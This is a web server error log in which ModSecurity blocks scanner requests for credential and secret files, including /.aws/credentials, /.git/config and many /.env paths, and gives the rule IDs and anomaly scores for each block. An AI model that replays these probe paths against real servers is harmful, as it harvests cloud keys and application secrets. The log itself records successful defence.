[Sun Feb 09 09:03:42.256225 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z6hhXgYgn2qAukdNQqsmmAAAAAE"]
[Sun Feb 09 09:03:42.256655 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z6hhXgYgn2qAukdNQqsmmAAAAAE"]
[Sun Feb 09 09:03:42.257365 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z6hhXgYgn2qAukdNQqsmmAAAAAE"]
[Sun Feb 09 09:03:44.731134 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z6hhYAYgn2qAukdNQqsmmQAAAAE"]
[Sun Feb 09 09:03:44.731590 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z6hhYAYgn2qAukdNQqsmmQAAAAE"]
[Sun Feb 09 09:03:44.732081 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z6hhYAYgn2qAukdNQqsmmQAAAAE"]
[Sun Feb 09 09:03:47.132116 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z6hhYwYgn2qAukdNQqsmmgAAAAE"]
[Sun Feb 09 09:03:47.132529 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z6hhYwYgn2qAukdNQqsmmgAAAAE"]
[Sun Feb 09 09:03:47.133116 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "Z6hhYwYgn2qAukdNQqsmmgAAAAE"]
[Sun Feb 09 09:03:49.690002 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z6hhZQYgn2qAukdNQqsmmwAAAAE"]
[Sun Feb 09 09:03:49.690730 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z6hhZQYgn2qAukdNQqsmmwAAAAE"]
[Sun Feb 09 09:03:49.691479 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z6hhZQYgn2qAukdNQqsmmwAAAAE"]
[Sun Feb 09 09:03:52.206451 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6hhaAYgn2qAukdNQqsmnAAAAAE"]
[Sun Feb 09 09:03:52.206859 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6hhaAYgn2qAukdNQqsmnAAAAAE"]
[Sun Feb 09 09:03:52.207347 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z6hhaAYgn2qAukdNQqsmnAAAAAE"]
[Sun Feb 09 09:03:54.828838 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6hhagYgn2qAukdNQqsmnQAAAAE"]
[Sun Feb 09 09:03:54.829234 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6hhagYgn2qAukdNQqsmnQAAAAE"]
[Sun Feb 09 09:03:54.829736 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z6hhagYgn2qAukdNQqsmnQAAAAE"]
[Sun Feb 09 09:03:57.207316 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6hhbQYgn2qAukdNQqsmngAAAAE"]
[Sun Feb 09 09:03:57.207608 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6hhbQYgn2qAukdNQqsmngAAAAE"]
[Sun Feb 09 09:03:57.207893 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z6hhbQYgn2qAukdNQqsmngAAAAE"]
[Sun Feb 09 09:03:59.635388 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6hhbwYgn2qAukdNQqsmnwAAAAE"]
[Sun Feb 09 09:03:59.635808 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6hhbwYgn2qAukdNQqsmnwAAAAE"]
[Sun Feb 09 09:03:59.636325 2025] [:error] [pid 1033859] [client 193.41.206.176:43204] [client 193.41.206.176] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z6hhbwYgn2qAukdNQqsmnwAAAAE"]
[Fri Feb 14 17:21:47.496826 2025] [:error] [pid 1147692] [client 89.248.163.4:60470] [client 89.248.163.4] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z69tm7XRADSPCxcjT1ypzQAAAAk"]
[Fri Feb 14 17:21:47.499590 2025] [:error] [pid 1147692] [client 89.248.163.4:60470] [client 89.248.163.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z69tm7XRADSPCxcjT1ypzQAAAAk"]
[Fri Feb 14 17:21:47.500084 2025] [:error] [pid 1147692] [client 89.248.163.4:60470] [client 89.248.163.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z69tm7XRADSPCxcjT1ypzQAAAAk"]
[Wed Feb 19 05:52:41.203328 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwIwAAAAk"]
[Wed Feb 19 05:52:41.206929 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwIwAAAAk"]
[Wed Feb 19 05:52:41.207347 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwIwAAAAk"]
[Wed Feb 19 05:52:41.247156 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJAAAAAk"]
[Wed Feb 19 05:52:41.247538 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJAAAAAk"]
[Wed Feb 19 05:52:41.247984 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJAAAAAk"]
[Wed Feb 19 05:52:41.276558 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJQAAAAk"]
[Wed Feb 19 05:52:41.276960 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJQAAAAk"]
[Wed Feb 19 05:52:41.277402 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJQAAAAk"]
[Wed Feb 19 05:52:41.318692 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJgAAAAk"]
[Wed Feb 19 05:52:41.319229 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJgAAAAk"]
[Wed Feb 19 05:52:41.319714 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJgAAAAk"]
[Wed Feb 19 05:52:41.344989 2025] [:error] [pid 1259335] [client 193.41.206.98:47872] [client 193.41.206.98] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "Z7VjmYC8jifnO0kJgZgwJwAAAAk"]
